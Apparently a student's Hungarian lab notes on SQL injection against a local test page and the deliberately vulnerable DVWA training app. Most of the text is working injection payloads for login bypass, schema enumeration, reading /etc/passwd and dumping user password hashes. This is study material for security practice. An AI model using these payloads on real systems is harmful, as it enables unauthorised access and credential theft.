sql injection
kell apache2 (Kalin van) és php sqlite támogatással (sudo apt-get install php5-sqlite; /etc/init.d/apache2 restart)

login jelszó nélkül EHA';#
Date mező:
' union select 1, name from sqlite_master where type = 'table';# --> milyen táblák vannak a db-ben
' union select name, sql from sqlite_master where type = 'table';# ---> oszlopok
' union select name, pwd from users;

// DVWA telepitese: https://www.youtube.com/watch?v=5BG6iq_AUvM
// elerhetoseg: 10.107.97.1/dvwa + admin - password
// Fontos: sudo service apache2 start + DVWA Security-ben a Sec. Level-t beallitani

https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/index.html
http://backtracktut.blogspot.hu/2013/08/sql-injection_8.html
https://pentestlab.blog/2012/09/18/sql-injection-exploitation-dvwa/

- ' or 1=1 # // user-ek

- 4' order by 1 # // a 4. user

- ' and 1=1 union select database(),version() # // db nev es sql szerver verzio

- %' or 0=0 union select null, user() # // db user - az eredmeny aljan

- %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# // a password infot tartalmazo tabla neve (a masodik surname)

- ' and 1=1 union select null,table_schema from information_schema.tables # // a tablak semai (adatbazisok) a szerveren

- ' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='TABLA_NEVE' # // a megadott sema (adatbazis) tablai; a TABLA_NEVE helyen valojaban adatbazisnev all, pl: dvwa

- ' and 1=1 union select first_name,password from ADATBAZIS.users # // milyen felhasznalok vannak a kivalaszott adatbazisban , pl: dvwa

- ' union SELECT 1, load_file('/etc/passwd') #

- ' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != ADATBAZIS # // db tablai es oszlopai

- %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # // oszlop field-ek megjelenitese

- %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # // password hash megszerzese